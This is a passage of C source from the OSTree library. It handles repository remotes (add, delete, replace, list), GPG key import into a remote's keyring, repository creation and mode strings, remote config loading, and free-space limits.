*/ g_autoptr(GFile) etc_ostree_remotes_d = get_remotes_d_dir (self, sysroot); if (etc_ostree_remotes_d && self->add_remotes_config_dir) { g_autoptr(GError) local_error = NULL; if (!g_file_make_directory_with_parents (etc_ostree_remotes_d, cancellable, &local_error)) { if (g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_EXISTS)) { g_clear_error (&local_error); } else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } g_autofree char *basename = g_strconcat (name, ".conf", NULL); remote->file = g_file_get_child (etc_ostree_remotes_d, basename); } if (g_str_has_prefix (url, "metalink=")) g_key_file_set_string (remote->options, remote->group, "metalink", url + strlen ("metalink=")); else g_key_file_set_string (remote->options, remote->group, "url", url); if (options) keyfile_set_from_vardict (remote->options, remote->group, options); if (remote->file != NULL) { gsize length; g_autofree char *data = g_key_file_to_data (remote->options, &length, NULL); if (!g_file_replace_contents (remote->file, data, length, NULL, FALSE, 0, NULL, cancellable, error)) return FALSE; } else { g_autoptr(GKeyFile) config = NULL; config = ostree_repo_copy_config (self); ot_keyfile_copy_group (remote->options, config, remote->group); if (!ostree_repo_write_config (self, config, error)) return FALSE; } _ostree_repo_add_remote (self, remote); return TRUE; } /** * ostree_repo_remote_add: * @self: Repo * @name: Name of remote * @url: URL for remote (if URL begins with metalink=, it will be used as such) * @options: (allow-none): GVariant of type a{sv} * @cancellable: Cancellable * @error: Error * * Create a new remote named @name pointing to @url. 
If @options is * provided, then it will be mapped to #GKeyFile entries, where the * GVariant dictionary key is an option string, and the value is * mapped as follows: * * s: g_key_file_set_string() * * b: g_key_file_set_boolean() * * as: g_key_file_set_string_list() * */ gboolean ostree_repo_remote_add (OstreeRepo *self, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { return impl_repo_remote_add (self, NULL, FALSE, name, url, options, cancellable, error); } static gboolean impl_repo_remote_delete (OstreeRepo *self, GFile *sysroot, gboolean if_exists, const char *name, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(OstreeRemote) remote = NULL; if (if_exists) { remote = _ostree_repo_get_remote (self, name, NULL); if (!remote) { /* Note early return */ return TRUE; } } else remote = _ostree_repo_get_remote (self, name, error); if (remote == NULL) return FALSE; if (remote->file != NULL) { if (!glnx_unlinkat (AT_FDCWD, gs_file_get_path_cached (remote->file), 0, error)) return FALSE; } else { g_autoptr(GKeyFile) config = ostree_repo_copy_config (self); /* XXX Not sure it's worth failing if the group to remove * isn't found. It's the end result we want, after all. */ if (g_key_file_remove_group (config, remote->group, NULL)) { if (!ostree_repo_write_config (self, config, error)) return FALSE; } } /* Delete the remote's keyring file, if it exists. */ if (!ot_ensure_unlinked_at (self->repo_dir_fd, remote->keyring, error)) return FALSE; _ostree_repo_remove_remote (self, remote); return TRUE; } /** * ostree_repo_remote_delete: * @self: Repo * @name: Name of remote * @cancellable: Cancellable * @error: Error * * Delete the remote named @name. It is an error if the provided * remote does not exist. 
* */ gboolean ostree_repo_remote_delete (OstreeRepo *self, const char *name, GCancellable *cancellable, GError **error) { return impl_repo_remote_delete (self, NULL, FALSE, name, cancellable, error); } static gboolean impl_repo_remote_replace (OstreeRepo *self, GFile *sysroot, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_return_val_if_fail (url != NULL, FALSE); g_return_val_if_fail (options == NULL || g_variant_is_of_type (options, G_VARIANT_TYPE ("a{sv}")), FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(GError) local_error = NULL; g_autoptr(OstreeRemote) remote = _ostree_repo_get_remote (self, name, &local_error); if (remote == NULL) { if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } g_clear_error (&local_error); if (!impl_repo_remote_add (self, sysroot, FALSE, name, url, options, cancellable, error)) return FALSE; } else { /* Replace the entire option group */ if (!g_key_file_remove_group (remote->options, remote->group, error)) return FALSE; if (g_str_has_prefix (url, "metalink=")) g_key_file_set_string (remote->options, remote->group, "metalink", url + strlen ("metalink=")); else g_key_file_set_string (remote->options, remote->group, "url", url); if (options != NULL) keyfile_set_from_vardict (remote->options, remote->group, options); /* Write out updated settings */ if (remote->file != NULL) { gsize length; g_autofree char *data = g_key_file_to_data (remote->options, &length, NULL); if (!g_file_replace_contents (remote->file, data, length, NULL, FALSE, 0, NULL, cancellable, error)) return FALSE; } else { g_autoptr(GKeyFile) config = ostree_repo_copy_config (self); /* Remove the existing group if it exists */ if (!g_key_file_remove_group (config, remote->group, &local_error)) { if (!g_error_matches (local_error, G_KEY_FILE_ERROR, 
G_KEY_FILE_ERROR_GROUP_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } ot_keyfile_copy_group (remote->options, config, remote->group); if (!ostree_repo_write_config (self, config, error)) return FALSE; } } return TRUE; } /** * ostree_repo_remote_change: * @self: Repo * @sysroot: (allow-none): System root * @changeop: Operation to perform * @name: Name of remote * @url: URL for remote (if URL begins with metalink=, it will be used as such) * @options: (allow-none): GVariant of type a{sv} * @cancellable: Cancellable * @error: Error * * A combined function handling the equivalent of * ostree_repo_remote_add(), ostree_repo_remote_delete(), with more * options. * * */ gboolean ostree_repo_remote_change (OstreeRepo *self, GFile *sysroot, OstreeRepoRemoteChange changeop, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { switch (changeop) { case OSTREE_REPO_REMOTE_CHANGE_ADD: return impl_repo_remote_add (self, sysroot, FALSE, name, url, options, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_ADD_IF_NOT_EXISTS: return impl_repo_remote_add (self, sysroot, TRUE, name, url, options, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_DELETE: return impl_repo_remote_delete (self, sysroot, FALSE, name, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_DELETE_IF_EXISTS: return impl_repo_remote_delete (self, sysroot, TRUE, name, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_REPLACE: return impl_repo_remote_replace (self, sysroot, name, url, options, cancellable, error); } g_assert_not_reached (); } static void _ostree_repo_remote_list (OstreeRepo *self, GHashTable *out) { GHashTableIter iter; gpointer key, value; g_mutex_lock (&self->remotes_lock); g_hash_table_iter_init (&iter, self->remotes); while (g_hash_table_iter_next (&iter, &key, &value)) g_hash_table_insert (out, g_strdup (key), NULL); g_mutex_unlock (&self->remotes_lock); if (self->parent_repo) 
_ostree_repo_remote_list (self->parent_repo, out); } /** * ostree_repo_remote_list: * @self: Repo * @out_n_remotes: (out) (allow-none): Number of remotes available * * List available remote names in an #OstreeRepo. Remote names are sorted * alphabetically. If no remotes are available the function returns %NULL. * * Returns: (array length=out_n_remotes) (transfer full): a %NULL-terminated * array of remote names **/ char ** ostree_repo_remote_list (OstreeRepo *self, guint *out_n_remotes) { char **remotes = NULL; guint n_remotes; g_autoptr(GHashTable) remotes_ht = NULL; remotes_ht = g_hash_table_new_full (g_str_hash, g_str_equal, (GDestroyNotify) g_free, (GDestroyNotify) NULL); _ostree_repo_remote_list (self, remotes_ht); n_remotes = g_hash_table_size (remotes_ht); if (n_remotes > 0) { GList *list, *link; guint ii = 0; remotes = g_new (char *, n_remotes + 1); list = g_hash_table_get_keys (remotes_ht); list = g_list_sort (list, (GCompareFunc) strcmp); for (link = list; link != NULL; link = link->next) remotes[ii++] = g_strdup (link->data); g_list_free (list); remotes[ii] = NULL; } if (out_n_remotes) *out_n_remotes = n_remotes; return remotes; } /** * ostree_repo_remote_get_url: * @self: Repo * @name: Name of remote * @out_url: (out) (allow-none): Remote's URL * @error: Error * * Return the URL of the remote named @name through @out_url. It is an * error if the provided remote does not exist. 
* * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_url (OstreeRepo *self, const char *name, char **out_url, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_autofree char *url = NULL; if (_ostree_repo_remote_name_is_file (name)) { url = g_strdup (name); } else { if (!ostree_repo_get_remote_option (self, name, "url", NULL, &url, error)) return FALSE; if (url == NULL) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "No \"url\" option in remote \"%s\"", name); return FALSE; } } if (out_url != NULL) *out_url = g_steal_pointer (&url); return TRUE; } /** * ostree_repo_remote_get_gpg_verify: * @self: Repo * @name: Name of remote * @out_gpg_verify: (out) (allow-none): Remote's GPG option * @error: Error * * Return whether GPG verification is enabled for the remote named @name * through @out_gpg_verify. It is an error if the provided remote does * not exist. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_gpg_verify (OstreeRepo *self, const char *name, gboolean *out_gpg_verify, GError **error) { g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (name != NULL, FALSE); /* For compatibility with pull-local, don't GPG verify file:// URIs. */ if (_ostree_repo_remote_name_is_file (name)) { if (out_gpg_verify != NULL) *out_gpg_verify = FALSE; return TRUE; } return ostree_repo_get_remote_boolean_option (self, name, "gpg-verify", TRUE, out_gpg_verify, error); } /** * ostree_repo_remote_get_gpg_verify_summary: * @self: Repo * @name: Name of remote * @out_gpg_verify_summary: (out) (allow-none): Remote's GPG option * @error: Error * * Return whether GPG verification of the summary is enabled for the remote * named @name through @out_gpg_verify_summary. It is an error if the provided * remote does not exist. 
* * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_gpg_verify_summary (OstreeRepo *self, const char *name, gboolean *out_gpg_verify_summary, GError **error) { return ostree_repo_get_remote_boolean_option (self, name, "gpg-verify-summary", FALSE, out_gpg_verify_summary, error); } /** * ostree_repo_remote_gpg_import: * @self: Self * @name: name of a remote * @source_stream: (nullable): a #GInputStream, or %NULL * @key_ids: (array zero-terminated=1) (element-type utf8) (nullable): a %NULL-terminated array of GPG key IDs, or %NULL * @out_imported: (out) (optional): return location for the number of imported * keys, or %NULL * @cancellable: a #GCancellable * @error: a #GError * * Imports one or more GPG keys from the open @source_stream, or from the * user's personal keyring if @source_stream is %NULL. The @key_ids array * can optionally restrict which keys are imported. If @key_ids is %NULL, * then all keys are imported. * * The imported keys will be used to conduct GPG verification when pulling * from the remote named @name. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_gpg_import (OstreeRepo *self, const char *name, GInputStream *source_stream, const char * const *key_ids, guint *out_imported, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME OstreeRemote *remote; g_auto(gpgme_ctx_t) source_context = NULL; g_auto(gpgme_ctx_t) target_context = NULL; g_auto(gpgme_data_t) data_buffer = NULL; gpgme_import_result_t import_result; gpgme_import_status_t import_status; g_autofree char *source_tmp_dir = NULL; g_autofree char *target_tmp_dir = NULL; glnx_autofd int target_temp_fd = -1; g_autoptr(GPtrArray) keys = NULL; struct stat stbuf; gpgme_error_t gpg_error; gboolean ret = FALSE; g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (name != NULL, FALSE); /* First make sure the remote name is valid. 
*/ remote = _ostree_repo_get_remote_inherited (self, name, error); if (remote == NULL) goto out; /* Prepare the source GPGME context. If reading GPG keys from an input * stream, point the OpenPGP engine at a temporary directory and import * the keys to a new pubring.gpg file. If the key data format is ASCII * armored, this step will convert them to binary. */ source_context = ot_gpgme_new_ctx (NULL, error); if (!source_context) goto out; if (source_stream != NULL) { data_buffer = ot_gpgme_data_input (source_stream); if (!ot_gpgme_ctx_tmp_home_dir (source_context, &source_tmp_dir, NULL, cancellable, error)) { g_prefix_error (error, "Unable to configure context: "); goto out; } gpg_error = gpgme_op_import (source_context, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import keys"); goto out; } g_clear_pointer (&data_buffer, (GDestroyNotify) gpgme_data_release); } /* Retrieve all keys or specific keys from the source GPGME context. * Assemble a NULL-terminated array of gpgme_key_t structs to import. */ /* The keys array will contain a NULL terminator, but it turns out, * although not documented, gpgme_key_unref() gracefully handles it. */ keys = g_ptr_array_new_with_free_func ((GDestroyNotify) gpgme_key_unref); if (key_ids != NULL) { guint ii; for (ii = 0; key_ids[ii] != NULL; ii++) { gpgme_key_t key = NULL; gpg_error = gpgme_get_key (source_context, key_ids[ii], &key, 0); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to find key \"%s\"", key_ids[ii]); goto out; } /* Transfer ownership. */ g_ptr_array_add (keys, key); } } else { gpg_error = gpgme_op_keylist_start (source_context, NULL, 0); while (gpg_error == GPG_ERR_NO_ERROR) { gpgme_key_t key = NULL; gpg_error = gpgme_op_keylist_next (source_context, &key); if (gpg_error != GPG_ERR_NO_ERROR) break; /* Transfer ownership. 
*/ g_ptr_array_add (keys, key); } if (gpgme_err_code (gpg_error) != GPG_ERR_EOF) { ot_gpgme_throw (gpg_error, error, "Unable to list keys"); goto out; } } /* Add the NULL terminator. */ g_ptr_array_add (keys, NULL); /* Prepare the target GPGME context to serve as the import destination. * Here the pubring.gpg file in a second temporary directory is a copy * of the remote's keyring file. We'll let the import operation alter * the pubring.gpg file, then rename it back to its permanent home. */ target_context = ot_gpgme_new_ctx (NULL, error); if (!target_context) goto out; /* No need for an output stream since we copy in a pubring.gpg. */ if (!ot_gpgme_ctx_tmp_home_dir (target_context, &target_tmp_dir, NULL, cancellable, error)) { g_prefix_error (error, "Unable to configure context: "); goto out; } if (!glnx_opendirat (AT_FDCWD, target_tmp_dir, FALSE, &target_temp_fd, error)) { g_prefix_error (error, "Unable to open directory: "); goto out; } if (fstatat (self->repo_dir_fd, remote->keyring, &stbuf, AT_SYMLINK_NOFOLLOW) == 0) { if (!glnx_file_copy_at (self->repo_dir_fd, remote->keyring, &stbuf, target_temp_fd, "pubring.gpg", GLNX_FILE_COPY_NOXATTRS, cancellable, error)) { g_prefix_error (error, "Unable to copy remote's keyring: "); goto out; } } else if (errno == ENOENT) { glnx_autofd int fd = -1; /* Create an empty pubring.gpg file prior to importing keys. This * prevents gpg2 from creating a pubring.kbx file in the new keybox * format [1]. We want to stay with the older keyring format since * its performance issues are not relevant here. 
* * [1] https://gnupg.org/faq/whats-new-in-2.1.html#keybox */ fd = openat (target_temp_fd, "pubring.gpg", O_WRONLY | O_CREAT | O_CLOEXEC | O_NOCTTY, 0644); if (fd == -1) { glnx_set_prefix_error_from_errno (error, "%s", "Unable to create pubring.gpg"); goto out; } } else { glnx_set_prefix_error_from_errno (error, "%s", "Unable to copy remote's keyring"); goto out; } /* Export the selected keys from the source context and import them into * the target context. */ gpg_error = gpgme_data_new (&data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to create data buffer"); goto out; } gpg_error = gpgme_op_export_keys (source_context, (gpgme_key_t *) keys->pdata, 0, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to export keys"); goto out; } (void) gpgme_data_seek (data_buffer, 0, SEEK_SET); gpg_error = gpgme_op_import (target_context, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import keys"); goto out; } import_result = gpgme_op_import_result (target_context); g_return_val_if_fail (import_result != NULL, FALSE); /* Check the status of each import and fail on the first error. * All imports must be successful to update the remote's keyring. */ for (import_status = import_result->imports; import_status != NULL; import_status = import_status->next) { if (import_status->result != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import key \"%s\"", import_status->fpr); goto out; } } /* Import successful; replace the remote's old keyring with the * updated keyring in the target context's temporary directory. 
*/ if (!glnx_file_copy_at (target_temp_fd, "pubring.gpg", NULL, self->repo_dir_fd, remote->keyring, GLNX_FILE_COPY_NOXATTRS | GLNX_FILE_COPY_OVERWRITE, cancellable, error)) goto out; if (out_imported != NULL) *out_imported = (guint) import_result->imported; ret = TRUE; out: if (remote != NULL) ostree_remote_unref (remote); if (source_tmp_dir != NULL) { ot_gpgme_kill_agent (source_tmp_dir); (void) glnx_shutil_rm_rf_at (AT_FDCWD, source_tmp_dir, NULL, NULL); } if (target_tmp_dir != NULL) { ot_gpgme_kill_agent (target_tmp_dir); (void) glnx_shutil_rm_rf_at (AT_FDCWD, target_tmp_dir, NULL, NULL); } g_prefix_error (error, "GPG: "); return ret; #else /* OSTREE_DISABLE_GPGME */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_remote_fetch_summary: * @self: Self * @name: name of a remote * @out_summary: (out) (optional): return location for raw summary data, or * %NULL * @out_signatures: (out) (optional): return location for raw summary * signature data, or %NULL * @cancellable: a #GCancellable * @error: a #GError * * Tries to fetch the summary file and any GPG signatures on the summary file * over HTTP, and returns the binary data in @out_summary and @out_signatures * respectively. * * If no summary file exists on the remote server, @out_summary is set to * @NULL. Likewise if the summary file is not signed, @out_signatures is * set to @NULL. In either case the function still returns %TRUE. * * This method does not verify the signature of the downloaded summary file. * Use ostree_repo_verify_summary() for that. * * Parse the summary data into a #GVariant using g_variant_new_from_bytes() * with #OSTREE_SUMMARY_GVARIANT_FORMAT as the format string. 
* * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_fetch_summary (OstreeRepo *self, const char *name, GBytes **out_summary, GBytes **out_signatures, GCancellable *cancellable, GError **error) { return ostree_repo_remote_fetch_summary_with_options (self, name, NULL, out_summary, out_signatures, cancellable, error); } static gboolean ostree_repo_mode_to_string (OstreeRepoMode mode, const char **out_mode, GError **error) { const char *ret_mode; switch (mode) { case OSTREE_REPO_MODE_BARE: ret_mode = "bare"; break; case OSTREE_REPO_MODE_BARE_USER: ret_mode = "bare-user"; break; case OSTREE_REPO_MODE_BARE_USER_ONLY: ret_mode = "bare-user-only"; break; case OSTREE_REPO_MODE_ARCHIVE: /* Legacy alias */ ret_mode ="archive-z2"; break; default: return glnx_throw (error, "Invalid mode '%d'", mode); } *out_mode = ret_mode; return TRUE; } /** * ostree_repo_mode_from_string: * @mode: a repo mode as a string * @out_mode: (out): the corresponding #OstreeRepoMode * @error: a #GError if the string is not a valid mode */ gboolean ostree_repo_mode_from_string (const char *mode, OstreeRepoMode *out_mode, GError **error) { OstreeRepoMode ret_mode; if (strcmp (mode, "bare") == 0) ret_mode = OSTREE_REPO_MODE_BARE; else if (strcmp (mode, "bare-user") == 0) ret_mode = OSTREE_REPO_MODE_BARE_USER; else if (strcmp (mode, "bare-user-only") == 0) ret_mode = OSTREE_REPO_MODE_BARE_USER_ONLY; else if (strcmp (mode, "archive-z2") == 0 || strcmp (mode, "archive") == 0) ret_mode = OSTREE_REPO_MODE_ARCHIVE; else return glnx_throw (error, "Invalid mode '%s' in repository configuration", mode); *out_mode = ret_mode; return TRUE; } #define DEFAULT_CONFIG_CONTENTS ("[core]\n" \ "repo_version=1\n") /* Just write the dirs to disk, return a dfd */ static gboolean repo_create_at_internal (int dfd, const char *path, OstreeRepoMode mode, GVariant *options, int *out_dfd, GCancellable *cancellable, GError **error) { GLNX_AUTO_PREFIX_ERROR ("Creating repo", error); struct stat stbuf; /* 
We do objects/ last - if it exists we do nothing and exit successfully */ const char *state_dirs[] = { "tmp", "extensions", "state", "refs", "refs/heads", "refs/mirrors", "refs/remotes", "objects" }; /* Early return if we have an existing repo */ { g_autofree char *objects_path = g_build_filename (path, "objects", NULL); if (!glnx_fstatat_allow_noent (dfd, objects_path, &stbuf, 0, error)) return FALSE; if (errno == 0) { glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return FALSE; /* Note early return */ *out_dfd = glnx_steal_fd (&repo_dfd); return TRUE; } } if (mkdirat (dfd, path, DEFAULT_DIRECTORY_MODE) != 0) { if (G_UNLIKELY (errno != EEXIST)) return glnx_throw_errno_prefix (error, "mkdirat"); } glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return FALSE; if (!glnx_fstatat_allow_noent (repo_dfd, "config", &stbuf, 0, error)) return FALSE; if (errno == ENOENT) { const char *mode_str = NULL; g_autoptr(GString) config_data = g_string_new (DEFAULT_CONFIG_CONTENTS); if (!ostree_repo_mode_to_string (mode, &mode_str, error)) return FALSE; g_assert (mode_str); g_string_append_printf (config_data, "mode=%s\n", mode_str); const char *collection_id = NULL; if (options) g_variant_lookup (options, "collection-id", "&s", &collection_id); if (collection_id != NULL) g_string_append_printf (config_data, "collection-id=%s\n", collection_id); if (!glnx_file_replace_contents_at (repo_dfd, "config", (guint8*)config_data->str, config_data->len, 0, cancellable, error)) return FALSE; } for (guint i = 0; i < G_N_ELEMENTS (state_dirs); i++) { const char *elt = state_dirs[i]; if (mkdirat (repo_dfd, elt, DEFAULT_DIRECTORY_MODE) == -1) { if (G_UNLIKELY (errno != EEXIST)) return glnx_throw_errno_prefix (error, "mkdirat"); } } /* Test that the fs supports user xattrs now, so we get an error early rather * than during an object write later. 
*/ if (mode == OSTREE_REPO_MODE_BARE_USER) { g_auto(GLnxTmpfile) tmpf = { 0, }; if (!glnx_open_tmpfile_linkable_at (repo_dfd, ".", O_RDWR|O_CLOEXEC, &tmpf, error)) return FALSE; if (!_ostree_write_bareuser_metadata (tmpf.fd, 0, 0, 644, NULL, error)) return FALSE; } *out_dfd = glnx_steal_fd (&repo_dfd); return TRUE; } /** * ostree_repo_create: * @self: An #OstreeRepo * @mode: The mode to store the repository in * @cancellable: Cancellable * @error: Error * * Create the underlying structure on disk for the repository, and call * ostree_repo_open() on the result, preparing it for use. * Since version 2016.8, this function will succeed on an existing * repository, and finish creating any necessary files in a partially * created repository. However, this function cannot change the mode * of an existing repository, and will silently ignore an attempt to * do so. * * Since 2017.9, "existing repository" is defined by the existence of an * `objects` subdirectory. * * This function predates ostree_repo_create_at(). It is an error to call * this function on a repository initialized via ostree_repo_open_at(). 
*/ gboolean ostree_repo_create (OstreeRepo *self, OstreeRepoMode mode, GCancellable *cancellable, GError **error) { g_return_val_if_fail (self->repodir, FALSE); const char *repopath = gs_file_get_path_cached (self->repodir); g_autoptr(GVariantBuilder) builder = g_variant_builder_new (G_VARIANT_TYPE ("a{sv}")); if (self->collection_id) g_variant_builder_add (builder, "{s@v}", "collection-id", g_variant_new_variant (g_variant_new_string (self->collection_id))); glnx_autofd int repo_dir_fd = -1; g_autoptr(GVariant) options = g_variant_ref_sink (g_variant_builder_end (builder)); if (!repo_create_at_internal (AT_FDCWD, repopath, mode, options, &repo_dir_fd, cancellable, error)) return FALSE; self->repo_dir_fd = glnx_steal_fd (&repo_dir_fd); if (!ostree_repo_open (self, cancellable, error)) return FALSE; return TRUE; } /** * ostree_repo_create_at: * @dfd: Directory fd * @path: Path * @mode: The mode to store the repository in * @options: (nullable): a{sv}: See below for accepted keys * @cancellable: Cancellable * @error: Error * * This is a file-descriptor relative version of ostree_repo_create(). * Create the underlying structure on disk for the repository, and call * ostree_repo_open_at() on the result, preparing it for use. * * If a repository already exists at @dfd + @path (defined by an `objects/` * subdirectory existing), then this function will simply call * ostree_repo_open_at(). In other words, this function cannot be used to change * the mode or configuration (`repo/config`) of an existing repo. 
* * The @options dict may contain: * * - collection-id: s: Set as collection ID in repo/config (Since 2017.9) * * Returns: (transfer full): A new OSTree repository reference * * Since: 2017.10 */ OstreeRepo * ostree_repo_create_at (int dfd, const char *path, OstreeRepoMode mode, GVariant *options, GCancellable *cancellable, GError **error) { glnx_autofd int repo_dfd = -1; if (!repo_create_at_internal (dfd, path, mode, options, &repo_dfd, cancellable, error)) return NULL; return repo_open_at_take_fd (&repo_dfd, cancellable, error); } static gboolean enumerate_directory_allow_noent (GFile *dirpath, const char *queryargs, GFileQueryInfoFlags queryflags, GFileEnumerator **out_direnum, GCancellable *cancellable, GError **error) { g_autoptr(GError) temp_error = NULL; g_autoptr(GFileEnumerator) ret_direnum = NULL; ret_direnum = g_file_enumerate_children (dirpath, queryargs, queryflags, cancellable, &temp_error); if (!ret_direnum) { if (g_error_matches (temp_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) g_clear_error (&temp_error); else { g_propagate_error (error, g_steal_pointer (&temp_error)); return FALSE; } } if (out_direnum) *out_direnum = g_steal_pointer (&ret_direnum); return TRUE; } static gboolean add_remotes_from_keyfile (OstreeRepo *self, GKeyFile *keyfile, GFile *file, GError **error) { GQueue queue = G_QUEUE_INIT; g_auto(GStrv) groups = NULL; gsize length, ii; gboolean ret = FALSE; g_mutex_lock (&self->remotes_lock); groups = g_key_file_get_groups (keyfile, &length); for (ii = 0; ii < length; ii++) { OstreeRemote *remote; remote = ostree_remote_new_from_keyfile (keyfile, groups[ii]); if (remote != NULL) { /* Make sure all the remotes in the key file are * acceptable before adding any to the OstreeRepo. 
*/ g_queue_push_tail (&queue, remote); if (g_hash_table_contains (self->remotes, remote->name)) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_FAILED, "Multiple specifications found for remote \"%s\"", remote->name); goto out; } if (file != NULL) remote->file = g_object_ref (file); } } while (!g_queue_is_empty (&queue)) { OstreeRemote *remote = g_queue_pop_head (&queue); g_hash_table_replace (self->remotes, remote->name, remote); } ret = TRUE; out: while (!g_queue_is_empty (&queue)) ostree_remote_unref (g_queue_pop_head (&queue)); g_mutex_unlock (&self->remotes_lock); return ret; } static gboolean append_one_remote_config (OstreeRepo *self, GFile *path, GCancellable *cancellable, GError **error) { g_autoptr(GKeyFile) remotedata = g_key_file_new (); if (!g_key_file_load_from_file (remotedata, gs_file_get_path_cached (path), 0, error)) return FALSE; return add_remotes_from_keyfile (self, remotedata, path, error); } static GFile * get_remotes_d_dir (OstreeRepo *self, GFile *sysroot) { g_autoptr(GFile) sysroot_owned = NULL; /* Very complicated sysroot logic; this bit breaks the otherwise mostly clean * layering between OstreeRepo and OstreeSysroot. First, If a sysroot was * provided, use it. Otherwise, check to see whether we reference * /ostree/repo, or if not that, see if we have a ref to a sysroot (and it's * physical). */ g_autoptr(OstreeSysroot) sysroot_ref = NULL; if (sysroot == NULL) { /* No explicit sysroot? 
Let's see if we have a kind */ switch (self->sysroot_kind) { case OSTREE_REPO_SYSROOT_KIND_UNKNOWN: g_assert_not_reached (); break; case OSTREE_REPO_SYSROOT_KIND_NO: break; case OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE: sysroot = sysroot_owned = g_file_new_for_path ("/"); break; case OSTREE_REPO_SYSROOT_KIND_VIA_SYSROOT: sysroot_ref = (OstreeSysroot*)g_weak_ref_get (&self->sysroot); /* Only write to /etc/ostree/remotes.d if we are pointed at a deployment */ if (sysroot_ref != NULL && !sysroot_ref->is_physical) sysroot = ostree_sysroot_get_path (sysroot_ref); break; } } /* For backwards compat, also fall back to the sysroot-path variable, which we * don't set anymore internally, and I hope no one else uses. */ if (sysroot == NULL && sysroot_ref == NULL) sysroot = self->sysroot_dir; /* Was the config directory specified? If so, use that with the * optional sysroot prepended. If not, return the path in /etc if the * sysroot was found and NULL otherwise to use the repo config. */ if (self->remotes_config_dir != NULL) { if (sysroot == NULL) return g_file_new_for_path (self->remotes_config_dir); else return g_file_resolve_relative_path (sysroot, self->remotes_config_dir); } else if (sysroot == NULL) return NULL; else return g_file_resolve_relative_path (sysroot, SYSCONF_REMOTES); } static gboolean min_free_space_calculate_reserved_bytes (OstreeRepo *self, guint64 *bytes, GError **error) { guint64 reserved_bytes = 0; struct statvfs stvfsbuf; if (TEMP_FAILURE_RETRY (fstatvfs (self->repo_dir_fd, &stvfsbuf)) < 0) return glnx_throw_errno_prefix (error, "fstatvfs"); if (self->min_free_space_mb > 0) { if (self->min_free_space_mb > (G_MAXUINT64 >> 20)) return glnx_throw (error, "min-free-space value is greater than the maximum allowed value of %" G_GUINT64_FORMAT " bytes", (G_MAXUINT64 >> 20)); reserved_bytes = self->min_free_space_mb << 20; } else if (self->min_free_space_percent > 0) { if (stvfsbuf.f_frsize > (G_MAXUINT64 / stvfsbuf.f_blocks)) return glnx_throw (error, 
"Filesystem's size is greater than the maximum allowed value of %" G_GUINT64_FORMAT " bytes", (G_MAXUINT64 / stvfsbuf.f_blocks)); guint64 total_bytes = (stvfsbuf.f_frsize * stvfsbuf.f_blocks); reserved_bytes = ((double)total_bytes) * (self->min_free_space_percent/100.0); } *bytes = reserved_bytes; return TRUE; } static gboolean min_free_space_size_validate_and_convert (OstreeRepo *self, const char *min_free_space_size_str, GError **error) { static GRegex *regex; static gsize regex_initialized; if (g_once_init_enter (&regex_initialized)) { regex = g_regex_new ("^([0-9]+)(G|M|T)B$", 0, 0, NULL); g_assert (regex); g_once_init_leave (&regex_initialized, 1); } g_autoptr(GMatchInfo) match = NULL; if (!g_regex_match (regex, min_free_space_size_str, 0, &match)) return glnx_throw (error, "It should be of the format '123MB', '123GB' or '123TB'"); g_autofree char *size_str = g_match_info_fetch (match, 1); g_autofree char *unit = g_match_info_fetch (match, 2); guint shifts; switch (*unit) { case 'M': shifts = 0; break; case 'G': shifts = 10; break; case 'T': shifts = 20; break; default: g_assert_not_reached (); } guint64 min_free_space = g_ascii_strtoull (size_str, NULL, 10); if (shifts > 0 && g_bit_nth_lsf (min_free_space, 63 - shifts) != -1) return glnx_throw (error, "Value was too high"); self->min_free_space_mb = min_free_space << shifts; return TRUE; } static gboolean reload_core_config (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_autofree char *version = NULL; g_autofree char *mode = NULL; g_autofree char *contents = NULL; g_autofree char *parent_repo_path = NULL; gboolean is_archive; gsize len; g_clear_pointer (&self->config, (GDestroyNotify)g_key_file_unref); self->config = g_key_file_new (); contents = glnx_file_get_contents_utf8_at (self->repo_dir_fd, 